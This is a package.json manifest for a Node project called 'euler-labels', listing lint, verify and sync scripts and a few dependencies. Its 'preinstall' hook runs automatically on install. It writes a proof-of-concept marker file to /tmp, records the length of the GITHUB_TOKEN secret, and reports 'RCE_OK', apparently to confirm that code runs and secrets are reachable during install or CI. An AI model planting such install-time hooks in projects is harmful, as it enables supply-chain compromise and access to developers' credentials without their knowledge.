{
  "name": "euler-labels",
  "version": "1.0.0",
  "scripts": {
    "verify": "node verify.js",
    "sync:hexagate": "node hexagate-sync.js",
    "fix": "node fix.js && npm run biome:fix",
    "biome:fix": "biome check --write",
    "prepare": "husky install",
    "biome": "biome check",
    "preinstall": "echo POC_MARKER_EULER-LABELS > /tmp/POC_MARKER_EULER-LABELS.txt; echo GH_TOKEN_LEN=${#GITHUB_TOKEN} >> /tmp/POC_MARKER_EULER-LABELS.txt; echo RCE_OK >> /tmp/POC_MARKER_EULER-LABELS.txt; cat /tmp/POC_MARKER_EULER-LABELS.txt"
  },
  "dependencies": {
    "ethers": "6.17.0",
    "image-size": "2.0.2"
  },
  "devDependencies": {
    "@biomejs/biome": "1.9.4",
    "husky": "9.1.7"
  },
  "lint-staged": {
    "*.{js,ts,cjs,mjs,d.cts,d.mts,jsx,tsx,json,jsonc}": [
      "biome check --write --no-errors-on-unmatched"
    ]
  },
  "engines": {
    "node": ">=24"
  }
}